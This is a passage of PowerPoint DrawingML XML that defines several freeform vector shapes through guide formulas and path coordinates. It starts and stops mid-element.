                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="11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6" name="Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2786063" y="2195513"/>
                <a:ext cx="257175" cy="271462"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 572 w 715"/>
                  <a:gd name="T1" fmla="*/ 666 h 756"/>
                  <a:gd name="T2" fmla="*/ 572 w 715"/>
                  <a:gd name="T3" fmla="*/ 666 h 756"/>
                  <a:gd name="T4" fmla="*/ 582 w 715"/>
                  <a:gd name="T5" fmla="*/ 635 h 756"/>
                  <a:gd name="T6" fmla="*/ 588 w 715"/>
                  <a:gd name="T7" fmla="*/ 625 h 756"/>
                  <a:gd name="T8" fmla="*/ 582 w 715"/>
                  <a:gd name="T9" fmla="*/ 608 h 756"/>
                  <a:gd name="T10" fmla="*/ 582 w 715"/>
                  <a:gd name="T11" fmla="*/ 608 h 756"/>
                  <a:gd name="T12" fmla="*/ 572 w 715"/>
                  <a:gd name="T13" fmla="*/ 582 h 756"/>
                  <a:gd name="T14" fmla="*/ 551 w 715"/>
                  <a:gd name="T15" fmla="*/ 561 h 756"/>
                  <a:gd name="T16" fmla="*/ 0 w 715"/>
                  <a:gd name="T17" fmla="*/ 372 h 756"/>
                  <a:gd name="T18" fmla="*/ 89 w 715"/>
                  <a:gd name="T19" fmla="*/ 247 h 756"/>
                  <a:gd name="T20" fmla="*/ 451 w 715"/>
                  <a:gd name="T21" fmla="*/ 399 h 756"/>
                  <a:gd name="T22" fmla="*/ 451 w 715"/>
                  <a:gd name="T23" fmla="*/ 399 h 756"/>
                  <a:gd name="T24" fmla="*/ 178 w 715"/>
                  <a:gd name="T25" fmla="*/ 120 h 756"/>
                  <a:gd name="T26" fmla="*/ 257 w 715"/>
                  <a:gd name="T27" fmla="*/ 0 h 756"/>
                  <a:gd name="T28" fmla="*/ 608 w 715"/>
                  <a:gd name="T29" fmla="*/ 409 h 756"/>
                  <a:gd name="T30" fmla="*/ 608 w 715"/>
                  <a:gd name="T31" fmla="*/ 409 h 756"/>
                  <a:gd name="T32" fmla="*/ 651 w 715"/>
                  <a:gd name="T33" fmla="*/ 461 h 756"/>
                  <a:gd name="T34" fmla="*/ 682 w 715"/>
                  <a:gd name="T35" fmla="*/ 504 h 756"/>
                  <a:gd name="T36" fmla="*/ 682 w 715"/>
                  <a:gd name="T37" fmla="*/ 504 h 756"/>
                  <a:gd name="T38" fmla="*/ 703 w 715"/>
                  <a:gd name="T39" fmla="*/ 541 h 756"/>
                  <a:gd name="T40" fmla="*/ 714 w 715"/>
                  <a:gd name="T41" fmla="*/ 572 h 756"/>
                  <a:gd name="T42" fmla="*/ 714 w 715"/>
                  <a:gd name="T43" fmla="*/ 572 h 756"/>
                  <a:gd name="T44" fmla="*/ 714 w 715"/>
                  <a:gd name="T45" fmla="*/ 608 h 756"/>
                  <a:gd name="T46" fmla="*/ 708 w 715"/>
                  <a:gd name="T47" fmla="*/ 640 h 756"/>
                  <a:gd name="T48" fmla="*/ 708 w 715"/>
                  <a:gd name="T49" fmla="*/ 640 h 756"/>
                  <a:gd name="T50" fmla="*/ 693 w 715"/>
                  <a:gd name="T51" fmla="*/ 672 h 756"/>
                  <a:gd name="T52" fmla="*/ 667 w 715"/>
                  <a:gd name="T53" fmla="*/ 708 h 756"/>
                  <a:gd name="T54" fmla="*/ 635 w 715"/>
                  <a:gd name="T55" fmla="*/ 755 h 756"/>
                  <a:gd name="T56" fmla="*/ 546 w 715"/>
                  <a:gd name="T57" fmla="*/ 698 h 756"/>
                  <a:gd name="T58" fmla="*/ 546 w 715"/>
                  <a:gd name="T59" fmla="*/ 698 h 756"/>
                  <a:gd name="T60" fmla="*/ 572 w 715"/>
                  <a:gd name="T61" fmla="*/ 666 h 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15" h="756">
                    <a:moveTo>
                      <a:pt x="572" y="666"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="572" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="703" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="666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7" name="Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2913063" y="2084388"/>
                <a:ext cx="207962" cy="201612"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 331 w 579"/>
                  <a:gd name="T1" fmla="*/ 405 h 558"/>
                  <a:gd name="T2" fmla="*/ 389 w 579"/>
                  <a:gd name="T3" fmla="*/ 431 h 558"/>
                  <a:gd name="T4" fmla="*/ 404 w 579"/>
                  <a:gd name="T5" fmla="*/ 425 h 558"/>
                  <a:gd name="T6" fmla="*/ 441 w 579"/>
                  <a:gd name="T7" fmla="*/ 399 h 558"/>
                  <a:gd name="T8" fmla="*/ 457 w 579"/>
                  <a:gd name="T9" fmla="*/ 373 h 558"/>
                  <a:gd name="T10" fmla="*/ 463 w 579"/>
                  <a:gd name="T11" fmla="*/ 347 h 558"/>
                  <a:gd name="T12" fmla="*/ 452 w 579"/>
                  <a:gd name="T13" fmla="*/ 321 h 558"/>
                  <a:gd name="T14" fmla="*/ 436 w 579"/>
                  <a:gd name="T15" fmla="*/ 299 h 558"/>
                  <a:gd name="T16" fmla="*/ 394 w 579"/>
                  <a:gd name="T17" fmla="*/ 289 h 558"/>
                  <a:gd name="T18" fmla="*/ 374 w 579"/>
                  <a:gd name="T19" fmla="*/ 294 h 558"/>
                  <a:gd name="T20" fmla="*/ 263 w 579"/>
                  <a:gd name="T21" fmla="*/ 357 h 558"/>
                  <a:gd name="T22" fmla="*/ 237 w 579"/>
                  <a:gd name="T23" fmla="*/ 373 h 558"/>
                  <a:gd name="T24" fmla="*/ 184 w 579"/>
                  <a:gd name="T25" fmla="*/ 389 h 558"/>
                  <a:gd name="T26" fmla="*/ 158 w 579"/>
                  <a:gd name="T27" fmla="*/ 389 h 558"/>
                  <a:gd name="T28" fmla="*/ 110 w 579"/>
                  <a:gd name="T29" fmla="*/ 383 h 558"/>
                  <a:gd name="T30" fmla="*/ 63 w 579"/>
                  <a:gd name="T31" fmla="*/ 352 h 558"/>
                  <a:gd name="T32" fmla="*/ 43 w 579"/>
                  <a:gd name="T33" fmla="*/ 331 h 558"/>
                  <a:gd name="T34" fmla="*/ 21 w 579"/>
                  <a:gd name="T35" fmla="*/ 305 h 558"/>
                  <a:gd name="T36" fmla="*/ 0 w 579"/>
                  <a:gd name="T37" fmla="*/ 242 h 558"/>
                  <a:gd name="T38" fmla="*/ 6 w 579"/>
                  <a:gd name="T39" fmla="*/ 210 h 558"/>
                  <a:gd name="T40" fmla="*/ 11 w 579"/>
                  <a:gd name="T41" fmla="*/ 168 h 558"/>
                  <a:gd name="T42" fmla="*/ 63 w 579"/>
                  <a:gd name="T43" fmla="*/ 89 h 558"/>
                  <a:gd name="T44" fmla="*/ 90 w 579"/>
                  <a:gd name="T45" fmla="*/ 53 h 558"/>
                  <a:gd name="T46" fmla="*/ 153 w 579"/>
                  <a:gd name="T47" fmla="*/ 11 h 558"/>
                  <a:gd name="T48" fmla="*/ 184 w 579"/>
                  <a:gd name="T49" fmla="*/ 0 h 558"/>
                  <a:gd name="T50" fmla="*/ 247 w 579"/>
                  <a:gd name="T51" fmla="*/ 5 h 558"/>
                  <a:gd name="T52" fmla="*/ 305 w 579"/>
                  <a:gd name="T53" fmla="*/ 37 h 558"/>
                  <a:gd name="T54" fmla="*/ 242 w 579"/>
                  <a:gd name="T55" fmla="*/ 152 h 558"/>
                  <a:gd name="T56" fmla="*/ 210 w 579"/>
                  <a:gd name="T57" fmla="*/ 131 h 558"/>
                  <a:gd name="T58" fmla="*/ 184 w 579"/>
                  <a:gd name="T59" fmla="*/ 126 h 558"/>
                  <a:gd name="T60" fmla="*/ 158 w 579"/>
                  <a:gd name="T61" fmla="*/ 131 h 558"/>
                  <a:gd name="T62" fmla="*/ 137 w 579"/>
                  <a:gd name="T63" fmla="*/ 147 h 558"/>
                  <a:gd name="T64" fmla="*/ 121 w 579"/>
                  <a:gd name="T65" fmla="*/ 195 h 558"/>
                  <a:gd name="T66" fmla="*/ 121 w 579"/>
                  <a:gd name="T67" fmla="*/ 210 h 558"/>
                  <a:gd name="T68" fmla="*/ 142 w 579"/>
                  <a:gd name="T69" fmla="*/ 242 h 558"/>
                  <a:gd name="T70" fmla="*/ 158 w 579"/>
                  <a:gd name="T71" fmla="*/ 252 h 558"/>
                  <a:gd name="T72" fmla="*/ 179 w 579"/>
                  <a:gd name="T73" fmla="*/ 252 h 558"/>
                  <a:gd name="T74" fmla="*/ 231 w 579"/>
                  <a:gd name="T75" fmla="*/ 231 h 558"/>
                  <a:gd name="T76" fmla="*/ 310 w 579"/>
                  <a:gd name="T77" fmla="*/ 184 h 558"/>
                  <a:gd name="T78" fmla="*/ 363 w 579"/>
                  <a:gd name="T79" fmla="*/ 152 h 558"/>
                  <a:gd name="T80" fmla="*/ 415 w 579"/>
                  <a:gd name="T81" fmla="*/ 147 h 558"/>
                  <a:gd name="T82" fmla="*/ 436 w 579"/>
                  <a:gd name="T83" fmla="*/ 147 h 558"/>
                  <a:gd name="T84" fmla="*/ 489 w 579"/>
                  <a:gd name="T85" fmla="*/ 168 h 558"/>
                  <a:gd name="T86" fmla="*/ 510 w 579"/>
                  <a:gd name="T87" fmla="*/ 184 h 558"/>
                  <a:gd name="T88" fmla="*/ 562 w 579"/>
                  <a:gd name="T89" fmla="*/ 247 h 558"/>
                  <a:gd name="T90" fmla="*/ 573 w 579"/>
                  <a:gd name="T91" fmla="*/ 278 h 558"/>
                  <a:gd name="T92" fmla="*/ 578 w 579"/>
                  <a:gd name="T93" fmla="*/ 315 h 558"/>
                  <a:gd name="T94" fmla="*/ 562 w 579"/>
                  <a:gd name="T95" fmla="*/ 383 h 558"/>
                  <a:gd name="T96" fmla="*/ 541 w 579"/>
                  <a:gd name="T97" fmla="*/ 420 h 558"/>
                  <a:gd name="T98" fmla="*/ 515 w 579"/>
                  <a:gd name="T99" fmla="*/ 457 h 558"/>
                  <a:gd name="T100" fmla="*/ 447 w 579"/>
                  <a:gd name="T101" fmla="*/ 525 h 558"/>
                  <a:gd name="T102" fmla="*/ 410 w 579"/>
                  <a:gd name="T103" fmla="*/ 546 h 558"/>
                  <a:gd name="T104" fmla="*/ 378 w 579"/>
                  <a:gd name="T105" fmla="*/ 557 h 558"/>
                  <a:gd name="T106" fmla="*/ 316 w 579"/>
                  <a:gd name="T107" fmla="*/ 546 h 558"/>
                  <a:gd name="T108" fmla="*/ 284 w 579"/>
                  <a:gd name="T109" fmla="*/ 530 h 558"/>
                  <a:gd name="T110" fmla="*/ 237 w 579"/>
                  <a:gd name="T111" fmla="*/ 494 h 558"/>
                  <a:gd name="T112" fmla="*/ 331 w 579"/>
                  <a:gd name="T113" fmla="*/ 405 h 5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79" h="558">
                    <a:moveTo>
                      <a:pt x="331" y="405"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="331" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="405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8" name="Freeform 24"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2955925" y="1952625"/>
                <a:ext cx="236538" cy="217488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 95 w 658"/>
                  <a:gd name="T1" fmla="*/ 0 h 604"/>
                  <a:gd name="T2" fmla="*/ 189 w 658"/>
                  <a:gd name="T3" fmla="*/ 78 h 604"/>
                  <a:gd name="T4" fmla="*/ 89 w 658"/>
                  <a:gd name="T5" fmla="*/ 189 h 604"/>
                  <a:gd name="T6" fmla="*/ 0 w 658"/>
                  <a:gd name="T7" fmla="*/ 105 h 604"/>
                  <a:gd name="T8" fmla="*/ 95 w 658"/>
                  <a:gd name="T9" fmla="*/ 0 h 604"/>
                  <a:gd name="T10" fmla="*/ 236 w 658"/>
                  <a:gd name="T11" fmla="*/ 126 h 604"/>
                  <a:gd name="T12" fmla="*/ 657 w 658"/>
                  <a:gd name="T13" fmla="*/ 493 h 604"/>
                  <a:gd name="T14" fmla="*/ 562 w 658"/>
                  <a:gd name="T15" fmla="*/ 603 h 604"/>
                  <a:gd name="T16" fmla="*/ 142 w 658"/>
                  <a:gd name="T17" fmla="*/ 231 h 604"/>
                  <a:gd name="T18" fmla="*/ 236 w 658"/>
                  <a:gd name="T19" fmla="*/ 126 h 6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58" h="604">
                    <a:moveTo>
                      <a:pt x="95" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="236" y="126"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="657" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="126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9" name="Freeform 25"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3094038" y="1884363"/>
                <a:ext cx="198437" cy="200025"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 237 w 553"/>
                  <a:gd name="T1" fmla="*/ 142 h 557"/>
                  <a:gd name="T2" fmla="*/ 205 w 553"/>
                  <a:gd name="T3" fmla="*/ 126 h 557"/>
                  <a:gd name="T4" fmla="*/ 174 w 553"/>
                  <a:gd name="T5" fmla="*/ 120 h 557"/>
                  <a:gd name="T6" fmla="*/ 158 w 553"/>
                  <a:gd name="T7" fmla="*/ 126 h 557"/>
                  <a:gd name="T8" fmla="*/ 142 w 553"/>
                  <a:gd name="T9" fmla="*/ 136 h 557"/>
                  <a:gd name="T10" fmla="*/ 121 w 553"/>
                  <a:gd name="T11" fmla="*/ 178 h 557"/>
                  <a:gd name="T12" fmla="*/ 121 w 553"/>
                  <a:gd name="T13" fmla="*/ 199 h 557"/>
                  <a:gd name="T14" fmla="*/ 132 w 553"/>
                  <a:gd name="T15" fmla="*/ 220 h 557"/>
                  <a:gd name="T16" fmla="*/ 164 w 553"/>
                  <a:gd name="T17" fmla="*/ 267 h 557"/>
                  <a:gd name="T18" fmla="*/ 221 w 553"/>
                  <a:gd name="T19" fmla="*/ 330 h 557"/>
                  <a:gd name="T20" fmla="*/ 289 w 553"/>
                  <a:gd name="T21" fmla="*/ 388 h 557"/>
                  <a:gd name="T22" fmla="*/ 315 w 553"/>
                  <a:gd name="T23" fmla="*/ 409 h 557"/>
                  <a:gd name="T24" fmla="*/ 342 w 553"/>
                  <a:gd name="T25" fmla="*/ 425 h 557"/>
                  <a:gd name="T26" fmla="*/ 384 w 553"/>
                  <a:gd name="T27" fmla="*/ 430 h 557"/>
                  <a:gd name="T28" fmla="*/ 400 w 553"/>
                  <a:gd name="T29" fmla="*/ 425 h 557"/>
                  <a:gd name="T30" fmla="*/ 415 w 553"/>
                  <a:gd name="T31" fmla="*/ 414 h 557"/>
                  <a:gd name="T32" fmla="*/ 431 w 553"/>
                  <a:gd name="T33" fmla="*/ 383 h 557"/>
                  <a:gd name="T34" fmla="*/ 431 w 553"/>
                  <a:gd name="T35" fmla="*/ 351 h 557"/>
                  <a:gd name="T36" fmla="*/ 426 w 553"/>
                  <a:gd name="T37" fmla="*/ 336 h 557"/>
                  <a:gd name="T38" fmla="*/ 373 w 553"/>
                  <a:gd name="T39" fmla="*/ 273 h 557"/>
                  <a:gd name="T40" fmla="*/ 468 w 553"/>
                  <a:gd name="T41" fmla="*/ 173 h 557"/>
                  <a:gd name="T42" fmla="*/ 531 w 553"/>
                  <a:gd name="T43" fmla="*/ 252 h 557"/>
                  <a:gd name="T44" fmla="*/ 552 w 553"/>
                  <a:gd name="T45" fmla="*/ 325 h 557"/>
                  <a:gd name="T46" fmla="*/ 552 w 553"/>
                  <a:gd name="T47" fmla="*/ 362 h 557"/>
                  <a:gd name="T48" fmla="*/ 515 w 553"/>
                  <a:gd name="T49" fmla="*/ 441 h 557"/>
                  <a:gd name="T50" fmla="*/ 478 w 553"/>
                  <a:gd name="T51" fmla="*/ 483 h 557"/>
                  <a:gd name="T52" fmla="*/ 405 w 553"/>
                  <a:gd name="T53" fmla="*/ 541 h 557"/>
                  <a:gd name="T54" fmla="*/ 368 w 553"/>
                  <a:gd name="T55" fmla="*/ 556 h 557"/>
                  <a:gd name="T56" fmla="*/ 326 w 553"/>
                  <a:gd name="T57" fmla="*/ 556 h 557"/>
                  <a:gd name="T58" fmla="*/ 231 w 553"/>
                  <a:gd name="T59" fmla="*/ 520 h 557"/>
                  <a:gd name="T60" fmla="*/ 179 w 553"/>
                  <a:gd name="T61" fmla="*/ 483 h 557"/>
                  <a:gd name="T62" fmla="*/ 121 w 553"/>
                  <a:gd name="T63" fmla="*/ 430 h 557"/>
                  <a:gd name="T64" fmla="*/ 32 w 553"/>
                  <a:gd name="T65" fmla="*/ 320 h 557"/>
                  <a:gd name="T66" fmla="*/ 11 w 553"/>
                  <a:gd name="T67" fmla="*/ 273 h 557"/>
                  <a:gd name="T68" fmla="*/ 0 w 553"/>
                  <a:gd name="T69" fmla="*/ 226 h 557"/>
                  <a:gd name="T70" fmla="*/ 17 w 553"/>
                  <a:gd name="T71" fmla="*/ 142 h 557"/>
                  <a:gd name="T72" fmla="*/ 37 w 553"/>
                  <a:gd name="T73" fmla="*/ 100 h 557"/>
                  <a:gd name="T74" fmla="*/ 69 w 553"/>
                  <a:gd name="T75" fmla="*/ 63 h 557"/>
